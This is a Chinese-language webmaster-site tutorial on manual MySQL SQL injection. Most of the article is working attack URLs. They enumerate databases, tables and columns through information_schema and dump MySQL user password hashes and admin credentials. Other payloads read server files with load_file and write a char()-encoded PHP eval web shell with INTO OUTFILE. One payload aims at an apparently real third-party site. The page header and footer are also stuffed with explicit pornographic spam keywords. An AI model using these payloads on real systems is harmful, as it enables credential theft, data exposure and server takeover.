青草久久影院-青草久久伊人-青草久久久-青草久久精品亚洲综合专区-SM双性精跪趴灌憋尿调教H-SM脚奴调教丨踩踏贱奴

17站長網

17站長網 首頁 安全 入侵防御 查看內容

手動mysql 高級注入實例分析

2022-9-26 13:00| 查看: 2158 |來源: 互聯網

利用Information_schema系統庫來注入,配合使用group_concat()函數,group_concat()功能強大,而且能夠繞過limit限制 http://127.0.0.1/sql.php?id=1 union select 0,0,0 字段為 3 http://127.0.0.1/sql.php?id=1 and 1
利用Information_schema系統庫來注入,配合使用group_concat()函數,group_concat()功能強大,而且能夠繞過limit限制

http://127.0.0.1/sql.php?id=1 union select 0,0,0 字段為 3
http://127.0.0.1/sql.php?id=1 and 1=2 union select count(*),1,1 from mysql.user 統計數據庫中又多少個用戶

http://127.0.0.1/sql.php?id=1 and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata 測試過程中只有 root權限或者 全局權限才能爆出所有數據庫 普通用戶不能爆出所有用戶
這樣就把mysql服務器所有數據庫名字顯示出來了

http://127.0.0.1/sql.php?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x74657374
這樣就能把 test 數據庫中的 所有表顯示出來了。 其中 0x74657374 為 test 的 hex 值

http://127.0.0.1/sql.php?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x61646D696E
這樣就把admin表中所有的字段名 顯示出來了。

這樣注入手法很靈活的。突破了 limit 限制了。
來看下 穿山甲的注入語句

以下部分只有root 權限或者 全局權限才能操作
======================================================================================================================================
select user from mysql.user

http://127.0.0.1/sql.php?id=1 and 1=2 union select concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),1,1 from (select * from (select * from mysql.user order by user limit 6,1)t order by user desc)t limit 1-- 查看數據庫中有那些用戶

http://127.0.0.1/sql.php?id=1 and 1=2 union select concat(char(94),char(94),char(94),password,char(94),char(94),char(94)),1,1 from (select * from (select * from mysql.user order by user limit 6,1) t order by user desc)t limit 1-- 查看對應用戶的 密碼

通過不斷修改limit 2,1達到查看所有 http://127.0.0.1/sql.php?id=1 and 1=2 union select concat(char(94),char(94),char(94),password,char(94),char(94),char(94)),1,1 from (select * from (select * from mysql.user order by user limit 2,1) t order by user desc)t limit 1--
===========================================================================================================================================================

http://127.0.0.1/sql.php?id=1 and 1=2 union select 1,username,password from admin limit 0,10
http://127.0.0.1/sql.php?id=1 and 1=2 union select 1,username,password from admin limit 1,10
http://127.0.0.1/sql.php?id=1 and 1=2 union select 1,username,password from admin limit 2,10
通過 limit 一條條記錄取出來

或者直接用group_concat()函數 一次顯示出來
http://127.0.0.1/sql.php?id=1 and 1=2 union select 1,group_concat(username),group_concat(password) from admin

into outfile 的應用 注意路徑是 這樣的c:/2ww.php
http://127.0.0.1/sql.php?id=1 and 1=2 union select concat(char(60),char(63),char(112),char(104),char(112),char(32),char(101),char(118),char(97),char(108),char(40),char(36),char(95),char(80),char(79),char(83),char(84),char(91),char(99),char(109),char(100),char(93),char(41),char(63),char(62)),1,1 into outfile 'c:/cm14dd.php'
的 asc碼 char(60),char(63),char(112),char(104),char(112),char(32),char(101),char(118),char(97),char(108),char(40),char(36),char(95),char(80),char(79),char(83),char(84),char(91),char(99),char(109),char(100),char(93),char(41),char(63),char(62)

http://127.0.0.1/sql.php?id=1 and 1=2 union select 1,'',3 into outfile 'c:/tt33.txt'

load_file 的應用

http://127.0.0.1//sql.php?id=1 and 1=2 union select concat(char(94),char(94),char(94),load_file(0x633a5c626f6f742e696e69),char(94),char(94),char(94)),1,1 --
0x633a5c626f6f742e696e69 是 c:\boot.ini 的 hex編碼
http://127.0.0.1/sql.php?id=1 and 1=2 union select 1,2,load_file('c:/boot.ini')

http://www.else1.com/concrete.php?id=5%20and%201=2%20union%20select%201,2,3,4,group_concat(schema_name)%20from%20information_schema.schemata
本文最后更新于 2022-9-26 13:00,某些文章具有時效性,若有錯誤或已失效,請在網站留言或聯系站長:17tui@17tui.com
·END·
站長網微信號:w17tui,關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!

掃一掃,關注站長網微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        主站蜘蛛池模板: 俄罗斯乌克兰战争原因 | 伊人久久大香线蕉资源 | 国产人妻777人伦精品HD | 久久精品国产色蜜蜜麻豆国语版 | 国产午夜亚洲精品理论片八戒 | 无人影院在线播放视频 | 久久精品无码人妻无码AV蜜臀 | 暗卫受被肉到失禁各种PLAY | 亚洲午夜精品A片久久不卡蜜桃 | 日本在线高清不卡免费播放 | 91精品国产色综合久久 | 护士喂我吃乳液我脱她内裤 | 顶级欧美不卡一区二区三区 | 最新无码国产在线视频9299 | 极品虎白在线观看 | 欧美麻豆一精品一AV一免费 | 久久re视频这里精品09免费 | 国产成人亚洲精品午夜国产馆 | 色婷婷粉嫩AV精品综合在线 | 国产美女一区二区 | 嗯啊快拔出来我是你老师视频 | 国产在线视频一区二区不卡 | 高清观看ZSHH96的视频素材 | 亚洲黄色在线 | 国产午夜精品视频在线播放 | 在线中文高清资源免费观看 | 亚洲另类欧美综合在线 | 国产亚洲精品久久久久久鸭绿欲 | 强壮的公次次弄得我高潮韩国电影 | 国产无遮挡又黄又爽在线视频 | 国产成人免费全部网站 | 青青草原直播 | 全文都是肉高h文 | 翁公咬着小娇乳H边走边欢A | 中国女人精69xxxxxx视频 | 国产网红主播精品福利大秀专区 | 国产精品大全国产精品 | 麻豆三级电影 | 狼人无码伊人AV啪啪 | 午夜dj影院视频观看 | 亚洲人成网站7777视频 |